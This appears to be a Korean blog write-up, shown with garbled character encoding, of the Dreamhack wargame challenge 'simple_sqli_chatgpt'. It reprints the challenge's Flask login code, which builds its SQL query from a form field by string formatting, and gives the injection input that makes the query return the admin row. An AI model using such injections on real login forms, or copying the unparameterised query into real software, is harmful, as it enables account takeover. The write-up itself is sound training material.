๐Ÿ”’ Cyber Security/Web Hacking (์›นํ•ดํ‚น)

[Dreamhack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น: simple_sqli_chatgpt

์„ ๋‹ฌ 2023. 11. 20. 17:06
๋ฐ˜์‘ํ˜•

https://dreamhack.io/wargame/challenges/769

 

simple_sqli_chatgpt

์–ด๋”˜๊ฐ€ ์ด์ƒํ•œ ๋กœ๊ทธ์ธ ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค. SQL INJECTION ์ทจ์•ฝ์ ์„ ํ†ตํ•ด ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” flag.txt, FLAG ๋ณ€์ˆ˜์— ์žˆ์Šต๋‹ˆ๋‹ค. chatGPT์™€ ํ•จ๊ป˜ ํ’€์–ด๋ณด์„ธ์š”! Reference Server-side Basic

dreamhack.io

 

๋ฌธ์ œ์„ค๋ช…

์–ด๋”˜๊ฐ€ ์ด์ƒํ•œ ๋กœ๊ทธ์ธ ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค.
SQL INJECTION ์ทจ์•ฝ์ ์„ ํ†ตํ•ด ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” flag.txt, FLAG ๋ณ€์ˆ˜์— ์žˆ์Šต๋‹ˆ๋‹ค.
chatGPT์™€ ํ•จ๊ป˜ ํ’€์–ด๋ณด์„ธ์š”!

๋”๋ณด๊ธฐ
#!/usr/bin/python3
from flask import Flask, request, render_template, g
import sqlite3
import os
import binascii

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

DATABASE = "database.db"
if os.path.exists(DATABASE) == False:
    db = sqlite3.connect(DATABASE)
    db.execute('create table users(userid char(100), userpassword char(100), userlevel integer);')
    db.execute(f'insert into users(userid, userpassword, userlevel) values ("guest", "guest", 0), ("admin", "{binascii.hexlify(os.urandom(16)).decode("utf8")}", 0);')
    db.commit()
    db.close()

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    db.row_factory = sqlite3.Row
    return db

def query_db(query, one=True):
    cur = get_db().execute(query)
    rv = cur.fetchall()
    cur.close()
    return (rv[0] if rv else None) if one else rv

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userlevel = request.form.get('userlevel')
        res = query_db(f"select * from users where userlevel=''")
        if res:
            userid = res[0]
            userlevel = res[2]
            print(userid, userlevel)
            if userid == 'admin' and userlevel == 0:
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

app.run(host='0.0.0.0', port=8000)

 

ํ’€์ด

์ง„์งœ ๋ญ”๊ฐ€ ์ด์ƒํ•œ ๋กœ๊ทธ์ธ ์„œ๋น„์Šค๋‹ค

 

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userlevel = request.form.get('userlevel')
        res = query_db(f"select * from users where userlevel='{userlevel}'")
        if res:
            userid = res[0]
            userlevel = res[2]
            print(userid, userlevel)
            if userid == 'admin' and userlevel == 0:
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

 

๋ฌธ์ œ๊ฐ€ ์ข€ ๊ธด๋ฐ ๊ฒฐ๊ตญ์€ userid๊ฐ€ admin์ด๊ณ  userlevel์ด 0์ธ ๊ฒฝ์šฐ์— ํผ์„ ์ œ์ถœํ•˜๋ฉด ํ”Œ๋ž˜๊ทธ๋ฅผ ๋ณด์—ฌ์ค€๋‹ค๋Š” ๋œป์ด๋‹ค

 

select * from users where userlevel='{userlevel}'

 

์ด๊ฒŒ SQL ๊ตฌ๋ฌธ

select * from users where userlevel='0' and userid='admin'

 

0' and userid='admin 

์ด๊ฑธ userlevel ๋ถ€๋ถ„์— ๋„ฃ์œผ๋ฉด ์กฐ๊ฑด์— ๋งž๊ฒŒ ์ฟผ๋ฆฌ๊ฐ€ ๋“ค์–ด๊ฐ„๋‹ค

 

๋„ˆ๋ฌด ๊ฐ„๋‹จํ•ด์„œ ์˜์‹ฌ์Šค๋Ÿฌ์šด ๋ฌธ์ œ

 

๋ฐ˜์‘ํ˜•